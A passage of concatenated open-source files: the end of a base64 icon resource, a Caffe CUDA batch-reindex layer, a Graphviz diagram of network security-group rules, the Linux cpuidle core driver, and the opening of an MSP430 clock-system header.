AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIsR7/CLMf/we2IP8HuCH/B7oj/we8JP8HvSX/Br8m/wbB
J/8Gwij/BsQp/wbFKf8Gxir/Bscq/wbHK/8FyCv/Bcgr/wXIK/8FyCv/Bcgr/wbHK/8Gxyr/BsYq/wbF
Kf8GxCn/BsIo/wbBJ/8Gvyb/B70l/we8JP8HuiP/B7gh/we2IP8Isx//CLEe/wAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAixHf8Isx//CLUg/we3
If8HuSL/B7sj/we8JP8HviX/Br8m/wbAJ/8Gwif/BsIo/wbDKP8GxCn/BsQp/wbFKf8GxSn/BsUp/wbE
Kf8GxCn/BsMo/wbDKP8Gwif/BsAn/wa/Jv8HviX/B7wk/we7I/8HuSL/B7ch/wi1IP8Isx//AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAiyHv8ItB//B7Yh/we4If8HuSL/B7sj/we8JP8HvSX/B74l/wa/Jv8GwCf/BsEn/wbB
J/8GwSf/BsEn/wbBJ/8GwSf/BsEn/wbAJ/8Gvyb/B74l/we9Jf8HvCT/B7sj/we5Iv8HuCH/B7Yh/wi0
H/8Ish7/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLEe/wizH/8ItSD/B7Yh/we4If8HuSL/B7oj/we7
JP8HvCT/B70k/we9Jf8HviX/B74l/we+Jf8HviX/B74l/we9Jf8HvST/B7wk/we7JP8HuiP/B7ki/we4
If8HtiH/CLUg/wizH/8IsR7/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIsR3/CLIe/wi0
H/8ItSD/B7Yh/we3If8HuCL/B7ki/we6I/8HuiP/B7sj/we7JP8HuyT/B7sk/we7I/8HuiP/B7oj/we5
Iv8HuCL/B7ch/we2If8ItSD/CLQf/wiyHv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAACK4c/wivHP8IsR3/CLIe/wizH/8ItB//CLUg/we2IP8HtyH/B7ch/we3If8HuCH/B7gh/we4
If8HtyH/B7ch/we3If8HtiD/CLUg/wi0H/8Isx//CLIe/wixHf8Irxz/CK4c/wAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAACakZ/wmrGv8JrBv/CK4c/wivHP8IsB3/CLEd/wiyHv8Ish7/CLMf/wi0
H/8ItB//CLQf/wi0H/8ItB//CLQf/wi0H/8Isx//CLMe/wiyHv8IsR3/CLAd/wivHP8Irhz/Cawb/wmr
Gv8JqRn/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAmnF/8JqBj/CakZ/wmrGv8JrBv/CK0b/wiu
HP8Irxz/CLAd/wiwHf8IsR3/CLEe/wixHv8IsR7/CLEe/wixHv8IsR3/CLAd/wiwHf8Irxz/CK4c/wit
G/8JrBv/Casa/wmpGf8JqBj/CacX/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJpBb/CaUW/wmm
F/8AAAAAAAAAAAAAAAAJqxr/Cawa/wmsG/8IrRv/CK0b/wiuHP8Irhz/CK4c/wiuHP8Irhz/CK0b/wit
G/8JrBv/Cawa/wmrGv8AAAAAAAAAAAAAAAAJphf/CaUW/wmkFv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAACqEU/wqiFf8JoxX/AAAAAAAAAAAAAAAAAAAAAAmoGP8JqRn/CaoZ/wmqGf8Jqhn/Casa/wmr
Gv8Jqxr/CaoZ/wmqGf8Jqhn/CakZ/wmoGP8AAAAAAAAAAAAAAAAAAAAAAAAAAAqiFf8KoRT/AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqeEv8KnxP/CqAT/wAAAAAAAAAAAAAAAAAAAAAAAAAACaYX/wmm
F/8Jpxf/CacX/wmnGP8Jpxj/CacY/wmnF/8Jpxf/CaYX/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAKnxP/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACpwR/wqdEv8AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAACaQW/wmkFv8JpBb/CaQW/wmkFv8JpBb/CaQW/wAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAACpwR/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuZ
D/8KmhD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACqEU/wqhFP8KoRT/CqEU/wAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACpoQ/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAC5cO/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//4AP8A//////gA/gB/////+AD+AH/////4AP4A//////gA/gD
/////+AD+AP/////4AP4A//////gA/gD/////0AD+AP////8AAP4Af////gAA/AB////8AAD8AHH///w
AAPwAeH///AAA/AB8f//8AAD8AHw///gAAHgATD//8AAAeABMP//wAAAwAEA///AAAAAAwD//8AwAAAD
gH//4DgAAAOAf//AfAAAA8B//8B8AAADwH//wHwAAAHAf//AeAAAAcB//8A4AAADgH//wBgAAAMAf//A
DAAABgB//8AMAAAGAH//wA8AAA4Af//ADwAAPgB//8APAAAeAH//4A8AAB4Af//gDwAAHAD///AGAAAI
AP//8AQAAAAB///4AAAAAAH///gAAAAAAf//+AAAAAAB///4AAAAAAH///gAAAAAAf//+AAAAAAD///4
AAAAAAf///gAAAAAB///+AAAAAAH///4AAAAAAf///wAAAAAB////AAAAAAP///+AAAAAA////8AAAAA
H////4AAAAB/////4AAAAP/////wAAAB//////gAAAf/////+AAAA//////wAAAB//////AAAAH/////
8cAAcf/////x4AD5//////HwA/v/////+fwH+//////5/w/3//////3/////////////////
</value>
</data>
</root> | {
"pile_set_name": "Github"
} |
#include <algorithm>
#include <utility>
#include <vector>
#include "caffe/layers/batch_reindex_layer.hpp"
#include "caffe/util/math_functions.hpp"
namespace caffe {
template<typename Dtype>
__global__ void BRForward(const int count, const int inner_dim, const Dtype* in,
const Dtype* permut, Dtype* out) {
CUDA_KERNEL_LOOP(index, count) {
int n = index / (inner_dim);
int in_n = static_cast<int>(permut[n]);
out[index] = in[in_n * (inner_dim) + index % (inner_dim)];
}
}
template<typename Dtype>
void BatchReindexLayer<Dtype>::Forward_gpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
check_batch_reindex(bottom[0]->shape(0), bottom[1]->count(),
bottom[1]->cpu_data());
if (top[0]->count() == 0) {
return;
}
int threads = top[0]->count();
// NOLINT_NEXT_LINE(whitespace/operators)
BRForward<Dtype> <<<CAFFE_GET_BLOCKS(threads), CAFFE_CUDA_NUM_THREADS>>>(
top[0]->count(), bottom[0]->count() / bottom[0]->shape(0),
bottom[0]->gpu_data(), bottom[1]->gpu_data(), top[0]->mutable_gpu_data());
CUDA_POST_KERNEL_CHECK;
}
template<typename Dtype>
__global__ void BRBackward(const int count, const int inner_dim,
const Dtype* in, const Dtype* top_indexes,
const Dtype* begins, const Dtype* counts,
Dtype* out) {
CUDA_KERNEL_LOOP(index, count) {
int n = index / (inner_dim);
out[index] = 0;
int lower = static_cast<int>(begins[n]);
int upper = lower + static_cast<int>(counts[n]);
for (int i = lower; i < upper; ++i) {
int in_n = static_cast<int>(top_indexes[i]);
out[index] += in[in_n * (inner_dim) + index % (inner_dim)];
}
}
}
template<typename Dtype>
void BatchReindexLayer<Dtype>::Backward_gpu(
const vector<Blob<Dtype>*>& top, const vector<bool>& propagate_down,
const vector<Blob<Dtype>*>& bottom) {
CHECK(!propagate_down[1]) << "Cannot backprop to index.";
if (!propagate_down[0]) {
return;
}
vector<std::pair<int, int> > mapping;
const Dtype* perm = bottom[1]->cpu_data();
for (int i = 0; i < bottom[1]->count(); ++i) {
mapping.push_back(pair<int, int>(static_cast<int>(perm[i]), i));
}
std::sort(mapping.begin(), mapping.end(), pair_sort_first());
// Each element of the bottom diff is potentially the sum of many top diffs.
// However, we'd like each CUDA thread to handle exactly one output. Hence,
// we first pre-compute a list of lists of indices that need to be summed for
// each output. `top_indexes` holds the data of this list of lists. The
// k'th element of `begins` points to the location in `top_indexes` where the
// list for the k'th example begin, and the k'th element of `counts` is the
// length of that list.
vector<int> shape;
shape.push_back(bottom[1]->count());
Blob<Dtype> top_indexes(shape);
shape[0] = bottom[0]->shape(0);
Blob<Dtype> counts(shape);
Blob<Dtype> begins(shape);
Dtype* t_i_data = top_indexes.mutable_cpu_data();
Dtype* c_data = counts.mutable_cpu_data();
Dtype* b_data = begins.mutable_cpu_data();
caffe_set(begins.count(), Dtype(-1), b_data);
caffe_set(counts.count(), Dtype(0), c_data);
for (int i = 0; i < mapping.size(); ++i) {
t_i_data[i] = mapping[i].second;
if (b_data[mapping[i].first] == -1) {
b_data[mapping[i].first] = i;
}
c_data[mapping[i].first] += 1;
}
int threads = bottom[0]->count();
// NOLINT_NEXT_LINE(whitespace/operators)
BRBackward<Dtype> <<<CAFFE_GET_BLOCKS(threads), CAFFE_CUDA_NUM_THREADS>>>(
bottom[0]->count(), bottom[0]->count() / bottom[0]->shape(0),
top[0]->gpu_diff(), top_indexes.gpu_data(), begins.gpu_data(),
counts.gpu_data(), bottom[0]->mutable_gpu_diff());
CUDA_POST_KERNEL_CHECK;
}
INSTANTIATE_LAYER_GPU_FUNCS(BatchReindexLayer);
} // namespace caffe
| {
"pile_set_name": "Github"
} |
digraph G {
graph [bb="0,0,388.31,144",
concentrate=true,
overlap=false,
rankdir=LR,
sep=1,
splines=true
];
node [label="\N"];
app [height=0.5,
label=app,
pos="222.32,72",
width=0.75];
db [height=0.5,
label=db,
pos="361.31,72",
width=0.75];
app -> db [color=blue,
label="5984/tcp",
lp="291.81,79",
pos="e,334.25,72 249.45,72 270.68,72 300.46,72 323.95,72",
style=bold];
"8.8.8.8/32" [height=0.5,
label="8.8.8.8/32",
pos="62.161,126",
width=1.2702];
"8.8.8.8/32" -> app [color=blue,
label="80/tcp",
lp="159.82,108",
pos="e,199.09,81.689 98.964,115.29 121.69,108.48 151.36,99.231 177.32,90 181.33,88.572 185.52,87.006 189.65,85.41",
style=bold];
"amazon-elb-sg" [height=0.5,
label="amazon-elb-sg",
pos="62.161,72",
width=1.7267];
"amazon-elb-sg" -> app [color=blue,
label="80/tcp",
lp="159.82,79",
pos="e,195.01,72 124.54,72 144.95,72 166.98,72 184.95,72",
style=bold];
"*" [height=0.5,
label="*",
pos="62.161,18",
width=0.75];
"*" -> app [color=blue,
label="22/tcp",
lp="159.82,61",
pos="e,199.09,62.311 87.055,25.175 110.5,32.076 146.53,43.049 177.32,54 181.33,55.428 185.52,56.994 189.65,58.59",
style=bold];
}
| {
"pile_set_name": "Github"
} |
/*
* cpuidle.c - core cpuidle infrastructure
*
* (C) 2006-2007 Venkatesh Pallipadi <[email protected]>
* Shaohua Li <[email protected]>
* Adam Belay <[email protected]>
*
* This code is licenced under the GPL.
*/
#include <linux/kernel.h>
#include <linux/mutex.h>
#include <linux/sched.h>
#include <linux/notifier.h>
#include <linux/pm_qos_params.h>
#include <linux/cpu.h>
#include <linux/cpuidle.h>
#include <linux/ktime.h>
#include <linux/hrtimer.h>
#include <trace/events/power.h>
#include "cpuidle.h"
DEFINE_PER_CPU(struct cpuidle_device *, cpuidle_devices);
DEFINE_MUTEX(cpuidle_lock);
LIST_HEAD(cpuidle_detected_devices);
static void (*pm_idle_old)(void);
static int enabled_devices;
#if defined(CONFIG_ARCH_HAS_CPU_IDLE_WAIT)
static void cpuidle_kick_cpus(void)
{
cpu_idle_wait();
}
#elif defined(CONFIG_SMP)
# error "Arch needs cpu_idle_wait() equivalent here"
#else /* !CONFIG_ARCH_HAS_CPU_IDLE_WAIT && !CONFIG_SMP */
static void cpuidle_kick_cpus(void) {}
#endif
static int __cpuidle_register_device(struct cpuidle_device *dev);
/**
* cpuidle_idle_call - the main idle loop
*
* NOTE: no locks or semaphores should be used here
*/
static void cpuidle_idle_call(void)
{
struct cpuidle_device *dev = __get_cpu_var(cpuidle_devices);
struct cpuidle_state *target_state;
int next_state;
/* check if the device is ready */
if (!dev || !dev->enabled) {
if (pm_idle_old)
pm_idle_old();
else
#if defined(CONFIG_ARCH_HAS_DEFAULT_IDLE)
default_idle();
#else
local_irq_enable();
#endif
return;
}
/*
* Call the device's prepare function before calling the
* governor's select function. ->prepare gives the device's
* cpuidle driver a chance to update any dynamic information
* of its cpuidle states for the current idle period, e.g.
* state availability, latencies, residencies, etc.
*/
if (dev->prepare)
dev->prepare(dev);
/* ask the governor for the next state */
next_state = cpuidle_curr_governor->select(dev);
if (need_resched()) {
local_irq_enable();
return;
}
target_state = &dev->states[next_state];
/* enter the state and update stats */
dev->last_state = target_state;
dev->last_residency = target_state->enter(dev, target_state);
if (dev->last_state)
target_state = dev->last_state;
target_state->time += (unsigned long long)dev->last_residency;
target_state->usage++;
/* give the governor an opportunity to reflect on the outcome */
if (cpuidle_curr_governor->reflect)
cpuidle_curr_governor->reflect(dev);
trace_power_end(smp_processor_id());
}
/**
* cpuidle_install_idle_handler - installs the cpuidle idle loop handler
*/
void cpuidle_install_idle_handler(void)
{
if (enabled_devices && (pm_idle != cpuidle_idle_call)) {
/* Make sure all changes finished before we switch to new idle */
smp_wmb();
pm_idle = cpuidle_idle_call;
}
}
/**
* cpuidle_uninstall_idle_handler - uninstalls the cpuidle idle loop handler
*/
void cpuidle_uninstall_idle_handler(void)
{
if (enabled_devices && pm_idle_old && (pm_idle != pm_idle_old)) {
pm_idle = pm_idle_old;
cpuidle_kick_cpus();
}
}
/**
* cpuidle_pause_and_lock - temporarily disables CPUIDLE
*/
void cpuidle_pause_and_lock(void)
{
mutex_lock(&cpuidle_lock);
cpuidle_uninstall_idle_handler();
}
EXPORT_SYMBOL_GPL(cpuidle_pause_and_lock);
/**
* cpuidle_resume_and_unlock - resumes CPUIDLE operation
*/
void cpuidle_resume_and_unlock(void)
{
cpuidle_install_idle_handler();
mutex_unlock(&cpuidle_lock);
}
EXPORT_SYMBOL_GPL(cpuidle_resume_and_unlock);
#ifdef CONFIG_ARCH_HAS_CPU_RELAX
static int poll_idle(struct cpuidle_device *dev, struct cpuidle_state *st)
{
ktime_t t1, t2;
s64 diff;
int ret;
t1 = ktime_get();
local_irq_enable();
while (!need_resched())
cpu_relax();
t2 = ktime_get();
diff = ktime_to_us(ktime_sub(t2, t1));
if (diff > INT_MAX)
diff = INT_MAX;
ret = (int) diff;
return ret;
}
static void poll_idle_init(struct cpuidle_device *dev)
{
struct cpuidle_state *state = &dev->states[0];
cpuidle_set_statedata(state, NULL);
snprintf(state->name, CPUIDLE_NAME_LEN, "C0");
snprintf(state->desc, CPUIDLE_DESC_LEN, "CPUIDLE CORE POLL IDLE");
state->exit_latency = 0;
state->target_residency = 0;
state->power_usage = -1;
state->flags = CPUIDLE_FLAG_POLL;
state->enter = poll_idle;
}
#else
static void poll_idle_init(struct cpuidle_device *dev) {}
#endif /* CONFIG_ARCH_HAS_CPU_RELAX */
/**
* cpuidle_enable_device - enables idle PM for a CPU
* @dev: the CPU
*
* This function must be called between cpuidle_pause_and_lock and
* cpuidle_resume_and_unlock when used externally.
*/
int cpuidle_enable_device(struct cpuidle_device *dev)
{
int ret, i;
if (dev->enabled)
return 0;
if (!cpuidle_get_driver() || !cpuidle_curr_governor)
return -EIO;
if (!dev->state_count)
return -EINVAL;
if (dev->registered == 0) {
ret = __cpuidle_register_device(dev);
if (ret)
return ret;
}
poll_idle_init(dev);
if ((ret = cpuidle_add_state_sysfs(dev)))
return ret;
if (cpuidle_curr_governor->enable &&
(ret = cpuidle_curr_governor->enable(dev)))
goto fail_sysfs;
for (i = 0; i < dev->state_count; i++) {
dev->states[i].usage = 0;
dev->states[i].time = 0;
}
dev->last_residency = 0;
dev->last_state = NULL;
smp_wmb();
dev->enabled = 1;
enabled_devices++;
return 0;
fail_sysfs:
cpuidle_remove_state_sysfs(dev);
return ret;
}
EXPORT_SYMBOL_GPL(cpuidle_enable_device);
/**
* cpuidle_disable_device - disables idle PM for a CPU
* @dev: the CPU
*
* This function must be called between cpuidle_pause_and_lock and
* cpuidle_resume_and_unlock when used externally.
*/
void cpuidle_disable_device(struct cpuidle_device *dev)
{
if (!dev->enabled)
return;
if (!cpuidle_get_driver() || !cpuidle_curr_governor)
return;
dev->enabled = 0;
if (cpuidle_curr_governor->disable)
cpuidle_curr_governor->disable(dev);
cpuidle_remove_state_sysfs(dev);
enabled_devices--;
}
EXPORT_SYMBOL_GPL(cpuidle_disable_device);
/**
* __cpuidle_register_device - internal register function called before register
* and enable routines
* @dev: the cpu
*
* cpuidle_lock mutex must be held before this is called
*/
static int __cpuidle_register_device(struct cpuidle_device *dev)
{
int ret;
struct sys_device *sys_dev = get_cpu_sysdev((unsigned long)dev->cpu);
struct cpuidle_driver *cpuidle_driver = cpuidle_get_driver();
if (!sys_dev)
return -EINVAL;
if (!try_module_get(cpuidle_driver->owner))
return -EINVAL;
init_completion(&dev->kobj_unregister);
/*
* cpuidle driver should set the dev->power_specified bit
* before registering the device if the driver provides
* power_usage numbers.
*
* For those devices whose ->power_specified is not set,
* we fill in power_usage with decreasing values as the
* cpuidle code has an implicit assumption that state Cn
* uses less power than C(n-1).
*
* With CONFIG_ARCH_HAS_CPU_RELAX, C0 is already assigned
* an power value of -1. So we use -2, -3, etc, for other
* c-states.
*/
if (!dev->power_specified) {
int i;
for (i = CPUIDLE_DRIVER_STATE_START; i < dev->state_count; i++)
dev->states[i].power_usage = -1 - i;
}
per_cpu(cpuidle_devices, dev->cpu) = dev;
list_add(&dev->device_list, &cpuidle_detected_devices);
if ((ret = cpuidle_add_sysfs(sys_dev))) {
module_put(cpuidle_driver->owner);
return ret;
}
dev->registered = 1;
return 0;
}
/**
* cpuidle_register_device - registers a CPU's idle PM feature
* @dev: the cpu
*/
int cpuidle_register_device(struct cpuidle_device *dev)
{
int ret;
mutex_lock(&cpuidle_lock);
if ((ret = __cpuidle_register_device(dev))) {
mutex_unlock(&cpuidle_lock);
return ret;
}
cpuidle_enable_device(dev);
cpuidle_install_idle_handler();
mutex_unlock(&cpuidle_lock);
return 0;
}
EXPORT_SYMBOL_GPL(cpuidle_register_device);
/**
* cpuidle_unregister_device - unregisters a CPU's idle PM feature
* @dev: the cpu
*/
void cpuidle_unregister_device(struct cpuidle_device *dev)
{
struct sys_device *sys_dev = get_cpu_sysdev((unsigned long)dev->cpu);
struct cpuidle_driver *cpuidle_driver = cpuidle_get_driver();
if (dev->registered == 0)
return;
cpuidle_pause_and_lock();
cpuidle_disable_device(dev);
cpuidle_remove_sysfs(sys_dev);
list_del(&dev->device_list);
wait_for_completion(&dev->kobj_unregister);
per_cpu(cpuidle_devices, dev->cpu) = NULL;
cpuidle_resume_and_unlock();
module_put(cpuidle_driver->owner);
}
EXPORT_SYMBOL_GPL(cpuidle_unregister_device);
#ifdef CONFIG_SMP
static void smp_callback(void *v)
{
/* we already woke the CPU up, nothing more to do */
}
/*
* This function gets called when a part of the kernel has a new latency
* requirement. This means we need to get all processors out of their C-state,
* and then recalculate a new suitable C-state. Just do a cross-cpu IPI; that
* wakes them all right up.
*/
static int cpuidle_latency_notify(struct notifier_block *b,
unsigned long l, void *v)
{
smp_call_function(smp_callback, NULL, 1);
return NOTIFY_OK;
}
static struct notifier_block cpuidle_latency_notifier = {
.notifier_call = cpuidle_latency_notify,
};
static inline void latency_notifier_init(struct notifier_block *n)
{
pm_qos_add_notifier(PM_QOS_CPU_DMA_LATENCY, n);
}
#else /* CONFIG_SMP */
#define latency_notifier_init(x) do { } while (0)
#endif /* CONFIG_SMP */
/**
* cpuidle_init - core initializer
*/
static int __init cpuidle_init(void)
{
int ret;
pm_idle_old = pm_idle;
ret = cpuidle_add_class_sysfs(&cpu_sysdev_class);
if (ret)
return ret;
latency_notifier_init(&cpuidle_latency_notifier);
return 0;
}
core_initcall(cpuidle_init);
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
*
* HAL_UCS.h
* Provides Functions to Initialize the UCS/FLL and clock sources
*
*
* Copyright (C) 2010 Texas Instruments Incorporated - http://www.ti.com/
*
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the
* distribution.
*
* Neither the name of Texas Instruments Incorporated nor the names of
* its contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* Created: Version 1.0 11/24/2009
* Updated: Version 2.0 12/15/2010
* Added Functions: XT2_Stop() and XT1_Stop()
*
******************************************************************************/
#ifndef HAL_UCS_H
#define HAL_UCS_H
#include "HAL_MACROS.h"
/*******************************************************************************
* Macros
******************************************************************************/
/* Select source for FLLREF e.g. SELECT_FLLREF(SELREF__XT1CLK) */
#define SELECT_FLLREF(source) st(UCSCTL3 = (UCSCTL3 & ~(SELREF_7)) | (source);)
/* Select source for ACLK e.g. SELECT_ACLK(SELA__XT1CLK) */
#define SELECT_ACLK(source) st(UCSCTL4 = (UCSCTL4 & ~(SELA_7)) | (source);)
/* Select source for MCLK e.g. SELECT_MCLK(SELM__XT2CLK) */
#define SELECT_MCLK(source) st(UCSCTL4 = (UCSCTL4 & ~(SELM_7)) | (source);)
/* Select source for SMCLK e.g. SELECT_SMCLK(SELS__XT2CLK) */
#define SELECT_SMCLK(source) st(UCSCTL4 = (UCSCTL4 & ~(SELS_7)) | (source);)
/* Select source for MCLK and SMCLK e.g. SELECT_MCLK_SMCLK(SELM__DCOCLK + SELS__DCOCLK) */
#define SELECT_MCLK_SMCLK(sources) st(UCSCTL4 = (UCSCTL4 & ~(SELM_7 + SELS_7)) | (sources);)
/* set ACLK/x */
#define ACLK_DIV(x) st(UCSCTL5 = (UCSCTL5 & ~(DIVA_7)) | (DIVA__##x);)
/* set MCLK/x */
#define MCLK_DIV(x) st(UCSCTL5 = (UCSCTL5 & ~(DIVM_7)) | (DIVM__##x);)
/* set SMCLK/x */
#define SMCLK_DIV(x) st(UCSCTL5 = (UCSCTL5 & ~(DIVS_7)) | (DIVS__##x);)
/* Select divider for FLLREF e.g. SELECT_FLLREFDIV(2) */
#define SELECT_FLLREFDIV(x) st(UCSCTL3 = (UCSCTL3 & ~(FLLREFDIV_7))|(FLLREFDIV__##x);)
/*******************************************************************************
* Defines
******************************************************************************/
#define UCS_STATUS_OK 0
#define UCS_STATUS_ERROR 1
#if 0
/*******************************************************************************
* \brief Startup routine for 32kHz Crystal on LFXT1
*
* \param xtdrive Bits defining the LFXT drive mode after startup
******************************************************************************/
extern void LFXT_Start(unsigned int xtdrive);
#endif
/*******************************************************************************
* \brief Startup routine for 32kHz Crystal on LFXT1 with timeout counter
*
* \param xtdrive Bits defining the LFXT drive mode after startup
* \param timeout Value for the timeout counter
******************************************************************************/
extern unsigned int LFXT_Start_Timeout(unsigned int xtdrive, unsigned int timeout);
#if 0
/*******************************************************************************
* \brief Startup routine for XT1
*
